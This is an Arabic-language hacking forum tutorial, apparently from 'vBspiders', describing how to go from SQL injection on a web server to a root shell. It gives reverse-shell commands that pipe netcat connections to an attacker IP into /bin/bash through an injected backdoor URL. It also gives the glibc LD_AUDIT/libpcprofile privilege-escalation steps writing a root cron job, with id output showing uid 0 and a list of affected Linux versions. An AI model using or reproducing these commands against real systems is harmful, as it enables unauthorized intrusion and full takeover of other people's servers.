:: vBspiders Professional Network :: - sqli-bsqli = remote root :)

[align=center]
اولا :- عمليه الاكسس

ثانيا:- عمليه التروييت مباشره

بسم الله نبداء :-

اولا لو انت بتستهدف سرفر من الشائع جدا انك تلاقى فيه ثغره زى ال sql او ال bsql ومنها ممكن تعمل انك تحقن ملف او كود معين فى السرفر من خلال ال dumpfile/outfile وده مش موضوعنا النهارده انما الموضوع كله هيبتدى فى الملف او الكود الى هنحقنه !

طيب عند حقن الملف اغلب الناس بتفكر انها تحقن شل او حتى لما بيشوفوا ثغره sql على طوول بيستعرض الجداول ويدور على اللوحة علشان يرفع شل !!!

بس النهارده مش عاوز شلات خالص تابعوا معى:-

بدل ما نحقن شل وندخل بصلاحيه اما user او no**** بس عاوزين نتخطى الصلاحيات ونوجد مكان نطبق منه الاوامر يبقى ممكن نحقن باك دوور او اى كود تانى يساعدنا اننا نعمل باك كونكت
طبعا الاكواد دى متوفره بلغات كتيير ولو دورت عليها هتلاقيها انما انا بفضل الباك دوورز بلغة ال php او البيرل فى العمليه دى لانها اسرع ومفهاش تعقديات كتير !

انا هنا هستخدم اداه اسمها php backdoor للاتصال بالسرفر من النت كات هتلاقوها هنا

او ممكن تسخدم الكود ده وتحاول تحقنة فى اى ملف فى السرفر وتستعرضة بعدين

اقتباس:

<?php $File = "/tmp/nc";
$Handle = fopen($File, 'w');
$Data = "\x41\x42\x43\x44";
fwrite($Handle, $Data);
fclose($Handle); ?>

طيب ولنفترض اننا نجحنا فى حقن الملف وده الطبيعى هندخل دلوقت للمتصفح عندنا ونستعرض الملف الى احنا كنا بنحقن بيه بالطريقة دى

اقتباس:

victim_ip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash

لاننا بنستخدم اتصال عكسى اما لو هنستخدم باك دوور بيرل يبقى ساعتها هنستخدم الرابط ده

اقتباس:

victim_ip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash

طيب دلوقت بعد ما حقنا الكود بتاع الباك دوور وعرفنا نستعرضة بمجر ما نستعرض واحد من الاتنين الى فوق من المتصفح ندخل على النت كات عندك سواء كنت بتستخدم ويندوز او لينكس واعمل تنصت كالتالى

اقتباس:

nc victimip 9999

دلوقت نشوف النتيجة

اقتباس:

nc victimip 9999
id
uid=65534(no****) gid=65534(nogroup) groups=65534(nogroup)

طبعا الصلاحيه هنا نوبادى دلوقت هندخل على المرحله التانيه وهى تخطى الصلاحيات عن طريق ثغره ال DSO وهى منتشره فى الرابط ده هنا

دلوقت نشوف التطبيق تابعوا معى انا هنا هشتغل لانى داخل من اتصال عكسى تابعوا معى الاوامر

اقتباس:

$ umask 0
$ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh
$ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
nc attackerip 79
id

طبق الاوامر الى فاتت بالترتيب هتلاقى صلاحيتك رووت

اقتباس:

uid=0(root) gid=0(root) groups=0(root)

اعتقد كده ووصلنا للروت ودى

بعض الملاحظات :-

اولا:- دى النسخ الى تم تجربت الطريقة عليها :-
2.12.1, FC13
2.5, RHEL5 / CentOS5
2.11.1, Ubuntu 10
وكمان Debian <=5.0.6 /Ubuntu <=10.04

وكل النسخ القائمة عليها

ثانيا:- كان ممكن اننا ننفذ كل حاجة برابط واحد وبامر واحد بس انا هنا كنت قاصد انى اطول فى الشرح شوية
علشان اوصل معلومه واحده لكل الاعضاء الا وهى

لان الان كل الى يرفع شل عن قريب اما بياخد ساسبند او ان الموقع بيقف لوحده او ان الشل بيرفع صفحة بيضاء او ان كل دوال الشل تكون غير فعاله لذلك حبيت الفت انتباهكم لاهميه موضوع الاتصال العكسى وده الى هنتكلم عليه فى مواضيعنا القادمه باذن الله [/align]